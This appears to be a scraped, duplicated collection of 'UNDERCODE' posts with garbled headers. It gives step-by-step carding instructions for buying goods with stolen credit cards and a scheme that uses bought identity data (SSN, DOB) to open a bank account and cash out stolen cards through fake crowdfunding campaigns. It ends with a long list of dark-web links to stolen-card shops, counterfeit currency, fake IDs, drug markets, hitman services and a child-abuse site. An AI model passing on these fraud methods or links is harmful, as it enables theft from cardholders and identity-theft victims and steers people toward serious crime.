β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crading Part 2 :
On Android :
1) First download Zenmate apk to your Android phone to hide your IP address.
2) After downloading Shadowsocks Apk use Socks on Android.
3) Now connect Zenmate & Shadowsocks to the same address on your credit card. Must be the same as the victim's address: COUNTRY, STATE, CITY
4) When all is done, create a Gmail with the same name as the credit card holder, but don't confirm with your phone number. Fill in the same address, the same city, and everything. Or better if you have email access.
5) Now go to the website store where you want the card. Search for your product.
6) Adding your products to the card is now logged out of your Amazon account. Log in to your Amazon account again after 2-4 hours. Don't click on process checkout now.
7) Create an account on Amazon with your credit card username now! Then fill in the credit card details.
8) Fill in all checkout information after
9) Then add the shipping address (the location of your order).
10) Now click on the order and I'm sure 100% of them will confirm your order via email or you will track your order on the website after you press the order.
11) (Please note that some websites require phone verification, but you can always buy a phone number on the internet or in real life, confirm your order, and destroy it after delivery)
12) Confirm your order now and wait for the order to reach your shipping address. When they call you, then say the different address you want to pick up the order ..
13) Those are the ones you have already done. Enjoy your grooming products now. Try it for myself I am not responsible for any kind of harm. As I mentioned above, this is illegal in India because they use a VPN to hide location and identity, so there is no risk of carders. Only you will be caught by your shipping address. If anything happens, only you are responsible in the police case.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crading Part 2 :
On Android :
1) First download Zenmate apk to your Android phone to hide your IP address.
2) After downloading Shadowsocks Apk use Socks on Android.
3) Now connect Zenmate & Shadowsocks to the same address on your credit card. Must be the same as the victim's address: COUNTRY, STATE, CITY
4) When all is done, create a Gmail with the same name as the credit card holder, but don't confirm with your phone number. Fill in the same address, the same city, and everything. Or better if you have email access.
5) Now go to the website store where you want the card. Search for your product.
6) Adding your products to the card is now logged out of your Amazon account. Log in to your Amazon account again after 2-4 hours. Don't click on process checkout now.
7) Create an account on Amazon with your credit card username now! Then fill in the credit card details.
8) Fill in all checkout information after
9) Then add the shipping address (the location of your order).
10) Now click on the order and I'm sure 100% of them will confirm your order via email or you will track your order on the website after you press the order.
11) (Please note that some websites require phone verification, but you can always buy a phone number on the internet or in real life, confirm your order, and destroy it after delivery)
12) Confirm your order now and wait for the order to reach your shipping address. When they call you, then say the different address you want to pick up the order ..
13) Those are the ones you have already done. Enjoy your grooming products now. Try it for myself I am not responsible for any kind of harm. As I mentioned above, this is illegal in India because they use a VPN to hide location and identity, so there is no risk of carders. Only you will be caught by your shipping address. If anything happens, only you are responsible in the police case.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Access to bank account
> This is not an option for you, so you need to use a fake bank information real bank account information, make the transfer.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
This is a very simple way to inside and out of the United States to get the detailed information of the bank. Let us suppose that you are in the United States, but if you are in the United States, you should pass the first step.
1) Log on to www.myus.com to buy a virtual address of the United States, although you are not the body, in the United States, it will be your residential address in the United States. Sent to the address of any project or product in your country will be transferred back to your real address. Note: you need to this address, so that you connected to the ATM card of bank account.
2) After you have paid for the address, found hackers and buy good fullz, fullz detailed information including card, SSN, DOB. After you bought, login to www.accountnow.com and use the SSN you bought details to open an account, nuclear submarines will be as a way to check the accountnow.com account, it will make them sent a bank account to you in any bank in the United States. Accountnow.com after your validation, connect to them to give you mail address in the United States, the detailed information of the bank ATM card, this means that you must use you bought at myus.com. They will card sent to your address of myus.com will now after 4 working days to ship its real address in your country. You now have a bank account, your debit card is ready.
3) VPN and socks
You can go to www.hidemyass.com to get a good VPN support for all countries. In order to obtain socks 5, 5, and you can just Google socks link will appear you buy and download.
Get the new credit card and debit card details
It is the key to the transfer, the most important part, in order to obtain good credit card details, please check our credit card store www.cardsmarket.su. It's more than 1 million credit card details of the empire, and you can get as low as $5.
4) Set up your merchant account
Note: the merchant account will allow you to buy your event, transferred to your bank account card charge. Since you don't have an online store, you do not sell anything, you will have to site by raising funds, using their own merchant account. Now log on to www.gofundme.com, set up an account with them, and they set up a campaign, if you don't know how to set up sports, go to www.indiegogo.com and copy any activity you choose. Now, your campaign Settings and is ready to receive the funds.
5) To generate and transfer money
Now, you can do this. This step shows how to generate $$. Log on to www.cardsmarket.su to buy any card that you choose to buy your card, please pay attention to the national credit CARDS, city and address. Your VPN connection to the card, after that use your socks 5 card to connect to the city. Let us suppose that you bought the card and the city of rochester in New York, all you need to do is your VPN connection to New York in the United States, then in your socks 5 connection to New York, rochester. Once connected, it will appear on the credit card company, is the true master of the card. Now go to your activity page, click on the donation, it will take you to a secure payment page, enter credit card information and submit. The card will be charged and the money will go directly to your account on gofundme.com.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Access to bank account
> This is not an option for you, so you need to use a fake bank information real bank account information, make the transfer.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
This is a very simple way to inside and out of the United States to get the detailed information of the bank. Let us suppose that you are in the United States, but if you are in the United States, you should pass the first step.
1) Log on to www.myus.com to buy a virtual address of the United States, although you are not the body, in the United States, it will be your residential address in the United States. Sent to the address of any project or product in your country will be transferred back to your real address. Note: you need to this address, so that you connected to the ATM card of bank account.
2) After you have paid for the address, found hackers and buy good fullz, fullz detailed information including card, SSN, DOB. After you bought, login to www.accountnow.com and use the SSN you bought details to open an account, nuclear submarines will be as a way to check the accountnow.com account, it will make them sent a bank account to you in any bank in the United States. Accountnow.com after your validation, connect to them to give you mail address in the United States, the detailed information of the bank ATM card, this means that you must use you bought at myus.com. They will card sent to your address of myus.com will now after 4 working days to ship its real address in your country. You now have a bank account, your debit card is ready.
3) VPN and socks
You can go to www.hidemyass.com to get a good VPN support for all countries. In order to obtain socks 5, 5, and you can just Google socks link will appear you buy and download.
Get the new credit card and debit card details
It is the key to the transfer, the most important part, in order to obtain good credit card details, please check our credit card store www.cardsmarket.su. It's more than 1 million credit card details of the empire, and you can get as low as $5.
4) Set up your merchant account
Note: the merchant account will allow you to buy your event, transferred to your bank account card charge. Since you don't have an online store, you do not sell anything, you will have to site by raising funds, using their own merchant account. Now log on to www.gofundme.com, set up an account with them, and they set up a campaign, if you don't know how to set up sports, go to www.indiegogo.com and copy any activity you choose. Now, your campaign Settings and is ready to receive the funds.
5) To generate and transfer money
Now, you can do this. This step shows how to generate $$. Log on to www.cardsmarket.su to buy any card that you choose to buy your card, please pay attention to the national credit CARDS, city and address. Your VPN connection to the card, after that use your socks 5 card to connect to the city. Let us suppose that you bought the card and the city of rochester in New York, all you need to do is your VPN connection to New York in the United States, then in your socks 5 connection to New York, rochester. Once connected, it will appear on the credit card company, is the true master of the card. Now go to your activity page, click on the donation, it will take you to a secure payment page, enter credit card information and submit. The card will be charged and the money will go directly to your account on gofundme.com.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ALL WORKING DEEP WEBSITES :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
To browse .onion Deep Web links, install Tor Browser from http://torproject.org/
Hidden Service lists and search engines
http://3g2upl4pq6kufc4m.onion/ β DuckDuckGo Search Engine
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page β Uncensored Hidden Wiki
http://idnxcnkne4qt76tg.onion/ β Tor Project: Anonymity Online
http://torlinkbgs6aabns.onion/ β TorLinks
http://jh32yv5zgayyyts3.onion/ β Hidden Wiki .Onion Urls
http://wikitjerrta4qgz4.onion/ β Hidden Wiki β Tor Wiki
http://xdagknwjc7aaytzh.onion/ β Anonet Webproxy
http://2vlqpcqpjlhmd5r2.onion/ β Gateway to Freenet
http://nlmymchrmnlmbnii.onion/ β Is It Up?
http://wiki5kauuihowqi5.onion/ β Onion Wiki β 650+ working 05.2017 deep web links
http://j6im4v42ur6dpic3.onion/ β TorProject Archive
http://p3igkncehackjtib.onion/ β TorProject Media
http://kbhpodhnfxl3clb4.onion β Tor Search
http://cipollatnumrrahd.onion/ β Cipolla 2.0 (Italian)
Marketplace Financial
http://torbrokerge7zxgq.onion/ β TorBroker β Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs
http://fogcore5n3ov3tui.onion/ β Bitcoin Fog β Bitcoin Laundry
http://2vx63nyktk4kxbxb.onion/ β AUTOMATED PAYPAL AND CREDIT CARD STORE
http://samsgdtwz6hvjyu4.onion β Safe, Anonymous, Fast, Easy escrow service.
http://easycoinsayj7p5l.onion/ β EasyCoin β Bitcoin Wallet with free Bitcoin Mixer
http://jzn5w5pac26sqef4.onion/ β WeBuyBitcoins β Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more
http://ow24et3tetp6tvmk.onion/ β OnionWallet β Anonymous Bitcoin Wallet and Bitcoin Laundry
http://qc7ilonwpv77qibm.onion/ β Western Union Exploit
http://3dbr5t4pygahedms.onion/ β ccPal Store
http://y3fpieiezy2sin4a.onion/ β HQER β High Quality Euro Replicas
http://qkj4drtgvpm7eecl.onion/ β Counterfeit USD
http://nr6juudpp4as4gjg.onion/pptobtc.html β PayPal to BitCoins
http://nr6juudpp4as4gjg.onion/doublecoins.html β Double Your BitCoins
http://lw4ipk5choakk5ze.onion/raw/4588/ β High Quality Tutorials
Marketplace Commercial Services
http://6w6vcynl6dumn67c.onion/ β Tor Market Board β Anonymous Marketplace Forums
http://wvk32thojln4gpp4.onion/ β Project Evil
http://5mvm7cg6bgklfjtp.onion/ β Discounted electronics goods
http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ β Unfriendlysolution β Legit hitman service
http://nr6juudpp4as4gjg.onion/torgirls.html β Tor Girls
http://tuu66yxvrnn3of7l.onion/ β UK Guns and Ammo
http://nr6juudpp4as4gjg.onion/torguns.htm β Used Tor Guns
http://ucx7bkbi2dtia36r.onion/ β Amazon Business
http://nr6juudpp4as4gjg.onion/tor.html β Tor Technology
http://hbetshipq5yhhrsd.onion/ β Hidden BetCoin
http://cstoreav7i44h2lr.onion/ β CStore Carded Store
http://tfwdi3izigxllure.onion/ β Apples 4 Bitcoin
http://e2qizoerj4d6ldif.onion/ β Carded Store
http://jvrnuue4bvbftiby.onion/ β Data-Bay
http://bgkitnugq5ef2cpi.onion/ β Hackintosh
http://vlp4uw5ui22ljlg7.onion/ β EuroArms
http://b4vqxw2j36wf2bqa.onion/ β Advantage Products
http://ybp4oezfhk24hxmb.onion/ β Hitman Network
http://mts7hqqqeogujc5e.onion/ β Marianic Technology Services
http://mobil7rab6nuf7vx.onion/ β Mobile Store
http://54flq67kqr5wvjqf.onion/ β MSR Shop
http://yth5q7zdmqlycbcz.onion/ β Old Man Fixerβs Fixing Services
http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png β PC Shop
http://storegsq3o5mfxiz.onion/ β Samsung StorE
http://sheep5u64fi457aw.onion/ β Sheep Marketplace
http://nr6juudpp4as4gjg.onion/betcoin.htm β Tor BetCoin
http://qizriixqwmeq4p5b.onion/ β Tor Web Developer
http://vfqnd6mieccqyiit.onion/ β UK Passports
http://en35tuzqmn4lofbk.onion/ β US Fake ID Store
http://xfnwyig7olypdq5r.onion/ β USA Citizenship
http://uybu3melulmoljnd.onion/ β iLike Help Guy
http://dbmv53j45pcv534x.onion/ β Network Consulting and Software Development
http://lw4ipk5choakk5ze.onion/raw/4585/ β Quick Solution (Hitman)
http://nr6juudpp4as4gjg.onion/tynermsr.htm β Tyner MSR Store
Marketplace Drugs
π¦ ALL WORKING DEEP WEBSITES :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
To browse .onion Deep Web links, install Tor Browser from http://torproject.org/
Hidden Service lists and search engines
http://3g2upl4pq6kufc4m.onion/ β DuckDuckGo Search Engine
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page β Uncensored Hidden Wiki
http://idnxcnkne4qt76tg.onion/ β Tor Project: Anonymity Online
http://torlinkbgs6aabns.onion/ β TorLinks
http://jh32yv5zgayyyts3.onion/ β Hidden Wiki .Onion Urls
http://wikitjerrta4qgz4.onion/ β Hidden Wiki β Tor Wiki
http://xdagknwjc7aaytzh.onion/ β Anonet Webproxy
http://2vlqpcqpjlhmd5r2.onion/ β Gateway to Freenet
http://nlmymchrmnlmbnii.onion/ β Is It Up?
http://wiki5kauuihowqi5.onion/ β Onion Wiki β 650+ working 05.2017 deep web links
http://j6im4v42ur6dpic3.onion/ β TorProject Archive
http://p3igkncehackjtib.onion/ β TorProject Media
http://kbhpodhnfxl3clb4.onion β Tor Search
http://cipollatnumrrahd.onion/ β Cipolla 2.0 (Italian)
Marketplace Financial
http://torbrokerge7zxgq.onion/ β TorBroker β Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs
http://fogcore5n3ov3tui.onion/ β Bitcoin Fog β Bitcoin Laundry
http://2vx63nyktk4kxbxb.onion/ β AUTOMATED PAYPAL AND CREDIT CARD STORE
http://samsgdtwz6hvjyu4.onion β Safe, Anonymous, Fast, Easy escrow service.
http://easycoinsayj7p5l.onion/ β EasyCoin β Bitcoin Wallet with free Bitcoin Mixer
http://jzn5w5pac26sqef4.onion/ β WeBuyBitcoins β Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more
http://ow24et3tetp6tvmk.onion/ β OnionWallet β Anonymous Bitcoin Wallet and Bitcoin Laundry
http://qc7ilonwpv77qibm.onion/ β Western Union Exploit
http://3dbr5t4pygahedms.onion/ β ccPal Store
http://y3fpieiezy2sin4a.onion/ β HQER β High Quality Euro Replicas
http://qkj4drtgvpm7eecl.onion/ β Counterfeit USD
http://nr6juudpp4as4gjg.onion/pptobtc.html β PayPal to BitCoins
http://nr6juudpp4as4gjg.onion/doublecoins.html β Double Your BitCoins
http://lw4ipk5choakk5ze.onion/raw/4588/ β High Quality Tutorials
Marketplace Commercial Services
http://6w6vcynl6dumn67c.onion/ β Tor Market Board β Anonymous Marketplace Forums
http://wvk32thojln4gpp4.onion/ β Project Evil
http://5mvm7cg6bgklfjtp.onion/ β Discounted electronics goods
http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ β Unfriendlysolution β Legit hitman service
http://nr6juudpp4as4gjg.onion/torgirls.html β Tor Girls
http://tuu66yxvrnn3of7l.onion/ β UK Guns and Ammo
http://nr6juudpp4as4gjg.onion/torguns.htm β Used Tor Guns
http://ucx7bkbi2dtia36r.onion/ β Amazon Business
http://nr6juudpp4as4gjg.onion/tor.html β Tor Technology
http://hbetshipq5yhhrsd.onion/ β Hidden BetCoin
http://cstoreav7i44h2lr.onion/ β CStore Carded Store
http://tfwdi3izigxllure.onion/ β Apples 4 Bitcoin
http://e2qizoerj4d6ldif.onion/ β Carded Store
http://jvrnuue4bvbftiby.onion/ β Data-Bay
http://bgkitnugq5ef2cpi.onion/ β Hackintosh
http://vlp4uw5ui22ljlg7.onion/ β EuroArms
http://b4vqxw2j36wf2bqa.onion/ β Advantage Products
http://ybp4oezfhk24hxmb.onion/ β Hitman Network
http://mts7hqqqeogujc5e.onion/ β Marianic Technology Services
http://mobil7rab6nuf7vx.onion/ β Mobile Store
http://54flq67kqr5wvjqf.onion/ β MSR Shop
http://yth5q7zdmqlycbcz.onion/ β Old Man Fixerβs Fixing Services
http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png β PC Shop
http://storegsq3o5mfxiz.onion/ β Samsung StorE
http://sheep5u64fi457aw.onion/ β Sheep Marketplace
http://nr6juudpp4as4gjg.onion/betcoin.htm β Tor BetCoin
http://qizriixqwmeq4p5b.onion/ β Tor Web Developer
http://vfqnd6mieccqyiit.onion/ β UK Passports
http://en35tuzqmn4lofbk.onion/ β US Fake ID Store
http://xfnwyig7olypdq5r.onion/ β USA Citizenship
http://uybu3melulmoljnd.onion/ β iLike Help Guy
http://dbmv53j45pcv534x.onion/ β Network Consulting and Software Development
http://lw4ipk5choakk5ze.onion/raw/4585/ β Quick Solution (Hitman)
http://nr6juudpp4as4gjg.onion/tynermsr.htm β Tyner MSR Store
Marketplace Drugs
www.torproject.org
The Tor Project | Privacy & Freedom Online
Defend yourself against tracking and surveillance. Circumvent censorship.
http://rso4hutlefirefqp.onion/ β EuCanna β Medical Grade Cannabis Buds, Rick Simpson Oil, Ointments and Creams
http://newpdsuslmzqazvr.onion/ β Peoples Drug Store β The Darkwebβs Best Online Drug Supplier!
http://smoker32pk4qt3mx.onion/ β Smokeables β Finest Organic Cannabis shipped from the USA
http://fzqnrlcvhkgbdwx5.onion/ β CannabisUK β UK Wholesale Cannabis Supplier
http://kbvbh4kdddiha2ht.onion/ β DeDope β German Weed and Hash shop. (Bitcoin)
http://s5q54hfww56ov2xc.onion/ β BitPharma β EU vendor for cocaine, speed, mdma, psychedelics and subscriptions
http://ll6lardicrvrljvq.onion/ β Brainmagic β Best psychedelics on the darknet
http://25ffhnaechrbzwf3.onion/ β NLGrowers β Coffee Shop grade Cannabis from the netherlands
http://fec33nz6mhzd54zj.onion/index.php β Black Market Reloaded Forums
http://atlmlxbk2mbupwgr.onion/ β Atlantis Marketplace Forums
http://atlantisrky4es5q.onion/ β Atlantis Marketplace
http://dkn255hz262ypmii.onion/ β Silk Road Forums
http://4yjes6zfucnh7vcj.onion/ β Drug Market
http://k4btcoezc5tlxyaf.onion/ β Kamagra for BitCoins
http://silkroadvb5piz3r.onion/silkroad/home β Silk Road Marketplace
http://5onwnspjvuk7cwvk.onion/ β Black Market Reloaded
Hosting
http://matrixtxri745dfw.onion/ β Image Uploader
http://lw4ipk5choakk5ze.onion/ β PasteThis β Tor based Pastebin
http://wzrtr6gpencksu3d.onion:8080/ β Gittor
http://nr6juudpp4as4gjg.onion/ β Free hosting
http://tklxxs3rdzdjppnl.onion/ β Libertyβs Hackers Hosting Service
http://matrixtxri745dfw.onion/ β Matrix Trilogy
Blogs
http://74ypjqjwf6oejmax.onion/ β Beneath VT β Exploring Virginia Techβs Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ β Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page β Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ β Hushbox
http://ad52wtwp2goynr3a.onion/# β Dark Like My Soul
http://tns7i5gucaaussz4.onion/ β FreeFor
http://gdkez5whqhpthb4d.onion/ β Scientology Archive
http://newsiiwanaduqpre.onion/ β All the latest news for tor
http://5vppavyzjkfs45r4.onion/ β Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ β AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ β Blog about Stories
http://tigas3l7uusztiqu.onion/ β Mike Tigas
http://mpf3i4k43xc2usxj.onion/ β Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ β An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ β Totse 2
http://4fvfamdpoulu2nms.onion/ β Lucky Eddieβs Home
http://nwycvryrozllb42g.onion/searchlores/index.htm β Fraviaβs Web Searching Lore
http://newsiiwanaduqpre.onion/ β OnionNews β Blog about the onionland
Forums and Chans
http://2gxxzwnj52jutais.onion/phpbb/index.php β Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ β Onii-Chan
http://bx7zrcsebkma7ids.onion β Jisko
http://npdaaf3s3f2xrmlo.onion/ β Twitter clone
http://jv7aqstbyhd5hqki.onion β HackBB β Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm β Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ β SciBay Forums
http://kpmp444tubeirwan.onion/ β DeepWeb
http://r5c2ch4h5rogigqi.onion/ β StaTorsNet
http://hbjw7wjeoltskhol.onion β The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ β OnionForum 3.0 β New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ β TorChan β One of the oldest chans on Tor
Email and Messaging
http://bitmailendavkbec.onion β swiss email
http://365u4txyqfy72nul.onion/ β Anonymous E-mail sevice. You can only communicate with other users currently using this service. So tell all your friends about it!
http://sms4tor3vcr2geip.onion/ β SMS4TOR β Self destructing messages
http://notestjxctkwbk6z.onion/ β NoteBin β Create encrypted self-destructing notes
http://torbox3uiot6wchz.onion/ β [TorBox] The Tor Mail Box
http://u6lyst27lmelm6oy.onion/index.php β Blue matrix chat NOT UP ALL THE TIME so chek often to see when it is
http://wi7qkxyrdpu5cmvr.onion/ β Autistici/Inventati
http://u4uoz3aphqbdc754.onion/ β Hell Online
Political
http://newpdsuslmzqazvr.onion/ β Peoples Drug Store β The Darkwebβs Best Online Drug Supplier!
http://smoker32pk4qt3mx.onion/ β Smokeables β Finest Organic Cannabis shipped from the USA
http://fzqnrlcvhkgbdwx5.onion/ β CannabisUK β UK Wholesale Cannabis Supplier
http://kbvbh4kdddiha2ht.onion/ β DeDope β German Weed and Hash shop. (Bitcoin)
http://s5q54hfww56ov2xc.onion/ β BitPharma β EU vendor for cocaine, speed, mdma, psychedelics and subscriptions
http://ll6lardicrvrljvq.onion/ β Brainmagic β Best psychedelics on the darknet
http://25ffhnaechrbzwf3.onion/ β NLGrowers β Coffee Shop grade Cannabis from the netherlands
http://fec33nz6mhzd54zj.onion/index.php β Black Market Reloaded Forums
http://atlmlxbk2mbupwgr.onion/ β Atlantis Marketplace Forums
http://atlantisrky4es5q.onion/ β Atlantis Marketplace
http://dkn255hz262ypmii.onion/ β Silk Road Forums
http://4yjes6zfucnh7vcj.onion/ β Drug Market
http://k4btcoezc5tlxyaf.onion/ β Kamagra for BitCoins
http://silkroadvb5piz3r.onion/silkroad/home β Silk Road Marketplace
http://5onwnspjvuk7cwvk.onion/ β Black Market Reloaded
Hosting
http://matrixtxri745dfw.onion/ β Image Uploader
http://lw4ipk5choakk5ze.onion/ β PasteThis β Tor based Pastebin
http://wzrtr6gpencksu3d.onion:8080/ β Gittor
http://nr6juudpp4as4gjg.onion/ β Free hosting
http://tklxxs3rdzdjppnl.onion/ β Libertyβs Hackers Hosting Service
http://matrixtxri745dfw.onion/ β Matrix Trilogy
Blogs
http://74ypjqjwf6oejmax.onion/ β Beneath VT β Exploring Virginia Techβs Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ β Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page β Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ β Hushbox
http://ad52wtwp2goynr3a.onion/# β Dark Like My Soul
http://tns7i5gucaaussz4.onion/ β FreeFor
http://gdkez5whqhpthb4d.onion/ β Scientology Archive
http://newsiiwanaduqpre.onion/ β All the latest news for tor
http://5vppavyzjkfs45r4.onion/ β Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ β AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ β Blog about Stories
http://tigas3l7uusztiqu.onion/ β Mike Tigas
http://mpf3i4k43xc2usxj.onion/ β Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ β An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ β Totse 2
http://4fvfamdpoulu2nms.onion/ β Lucky Eddieβs Home
http://nwycvryrozllb42g.onion/searchlores/index.htm β Fraviaβs Web Searching Lore
http://newsiiwanaduqpre.onion/ β OnionNews β Blog about the onionland
Forums and Chans
http://2gxxzwnj52jutais.onion/phpbb/index.php β Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ β Onii-Chan
http://bx7zrcsebkma7ids.onion β Jisko
http://npdaaf3s3f2xrmlo.onion/ β Twitter clone
http://jv7aqstbyhd5hqki.onion β HackBB β Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm β Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ β SciBay Forums
http://kpmp444tubeirwan.onion/ β DeepWeb
http://r5c2ch4h5rogigqi.onion/ β StaTorsNet
http://hbjw7wjeoltskhol.onion β The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ β OnionForum 3.0 β New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ β TorChan β One of the oldest chans on Tor
Email and Messaging
http://bitmailendavkbec.onion β swiss email
http://365u4txyqfy72nul.onion/ β Anonymous E-mail sevice. You can only communicate with other users currently using this service. So tell all your friends about it!
http://sms4tor3vcr2geip.onion/ β SMS4TOR β Self destructing messages
http://notestjxctkwbk6z.onion/ β NoteBin β Create encrypted self-destructing notes
http://torbox3uiot6wchz.onion/ β [TorBox] The Tor Mail Box
http://u6lyst27lmelm6oy.onion/index.php β Blue matrix chat NOT UP ALL THE TIME so chek often to see when it is
http://wi7qkxyrdpu5cmvr.onion/ β Autistici/Inventati
http://u4uoz3aphqbdc754.onion/ β Hell Online
Political
http://6sgjmi53igmg7fm7.onion/index.php?title=Main_Page β Bugged Planet
http://faerieuaahqvzgby.onion/ β Fairie Underground
http://2r2tz6wzqh7gaji7.onion/ β Kavkaz Center
http://tnysbtbxsf356hiy.onion/ β The New Yorker Strongbox
http://duskgytldkxiuqc6.onion/ β Example rendezvous points page
http://rrcc5uuudhh4oz3c.onion/ β The Intel Exchange Forum :: Information and discussion on various topics, ranging from Illegal Activities and Alternative Energy, to Conspiracy Theories and Hacking. Same people from SnapBBS on a fully secure, moderated and categorized forum.
http://opnju4nyz7wbypme.onion/weblog/index.html β A7B blog :: a blog dedicated to the restoration of a limited constitutional republic in the USA
http://assmkedzgorodn7o.onion/ β Anonymous, safe, secure, crowdfunded assassinations.
http://duskgytldkxiuqc6.onion/comsense.html β Commo Sense by Thomas Paine
http://nwycvryrozllb42g.onion/ β Destination Unknown
http://zbnnr7qzaxlk5tms.onion/ β Wiki Leaks
Hacking
http://salted7fpnlaguiq.onion/ β SALT
http://yj5rbziqttulgidy.onion/ β Itanimulli
http://bbxdfsru7lmmbj32.onion/marketplace/ β Delta Initiative
http://2ogmrlfzdthnwkez.onion/ β Rent-A-Hacker
Warez
http://2gxxzwnj52jutais.onion/ β The Nowhere Server (restored from backup after FH)
http://jntlesnev5o7zysa.onion/ β The Pirate Bay β Torrents
http://am4wuhz3zifexz5u.onion/ β Tor Library β library of books and other media files
http://uj3wazyk5u4hnvtk.onion/ β The Pirate Bay β Torrents (official .onion)
http://doxbindtelxceher.onion/ β DOXBIN
http://wuvdsbmbwyjzsgei.onion/ β Music Downloads
http://lolicore75rq3tm5.onion/ β Lolicore and Speedcore Music
http://xfmro77i3lixucja.onion/ β ebooks
http://vt27twhtksyvjrky.onion/ β lol 20th Century Western Music Recordings and Scores
http://2ygbaoezjdmacnro.onion/ β Pony at Noisebridge
http://xfmro77i3lixucja.onion/ β Imperial Library of Trantor
http://c3jemx2ube5v5zpg.onion/ β Jotunbaneβs Reading Club
Drugs Non-commercial
No links found.
Erotic 18+
http://tklxxs3rdzdjppnl.onion/sharepass/ β SharePass β Password sharing community
http://k4jmdeccpnsfe43c.onion/ β Girls Released β Some nice model pics
http://54dgeda4ik6iypui.onion/ β Gallery β Met-Art, FTVX etc sets
http://pinkmethuylnenlz.onion/ β The Pink Meth (mirror)
http://2fqgjzbb2h7yevom.onion/klixen/ β Klixen
http://orsxvca7glswueo7.onion/ β EroDir β Lots and lots of Hentai
http://mmgh3rqeswrlgzdr.onion/ β VOR-COM
Erotic Hard Candy
Hard candy links no longer working and removed.
Erotic Jailbait
Non-English
http://germanyhusicaysx.onion β Deutschland im Deep Web β German forum
http://ffi5v46ttwgx3fby.onion/ β Das ist Deutschland hier 2.0 β German Board
http://paisleli66axejos.onion/ β PAIS
http://hyjmkmb3lfymiprp.onion/hen/papieze/ β DzieciΔca pedofilia
http://runionv62ul3roit.onion/ β Russian Onion Union
http://s6cco2jylmxqcdeh.onion/ β ?ltimos bumps
http://5xki35vc4g5ts6gc.onion β GTF Greek Tor Forum . For greek speaking users
http://cipollatnumrrahd.onion/index.php β Cipolla 2.0 β Italian Community
http://runionv62ul3roit.onion β Russian community: market and anonymous talks about security, guns etc.
http://ptrackcp2noqu5fh.onion/ β PoliceTrack β Ne vous faites plus suivre par la police.
http://amberoadychffmyw.onion β Amberoad β russian anonymous market
http://r2d2akbw3jpt4zbf.onion β R2D2 β russian anonymous market
http://ramp2bombkadwvgz.onion β RAMP β biggest russian market (drugs only)
http://szmyt4v4vjbnxpg3.onion/ β Π‘Π»Π°Π²ΡΠ½ΡΠΊΠΈΠΉ
http://o2tu5zjxjlibrary.onion/ β Bibliotheca Alexandrina
http://xzzpowtjlobho6kd.onion/wordpress/ β DeepBlog
http://zqiirytam276uogb.onion/ β Thorlauta
http://ocbh4hoqs37unvv6.onion β French Deep Web
For More
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
http://faerieuaahqvzgby.onion/ β Fairie Underground
http://2r2tz6wzqh7gaji7.onion/ β Kavkaz Center
http://tnysbtbxsf356hiy.onion/ β The New Yorker Strongbox
http://duskgytldkxiuqc6.onion/ β Example rendezvous points page
http://rrcc5uuudhh4oz3c.onion/ β The Intel Exchange Forum :: Information and discussion on various topics, ranging from Illegal Activities and Alternative Energy, to Conspiracy Theories and Hacking. Same people from SnapBBS on a fully secure, moderated and categorized forum.
http://opnju4nyz7wbypme.onion/weblog/index.html β A7B blog :: a blog dedicated to the restoration of a limited constitutional republic in the USA
http://assmkedzgorodn7o.onion/ β Anonymous, safe, secure, crowdfunded assassinations.
http://duskgytldkxiuqc6.onion/comsense.html β Commo Sense by Thomas Paine
http://nwycvryrozllb42g.onion/ β Destination Unknown
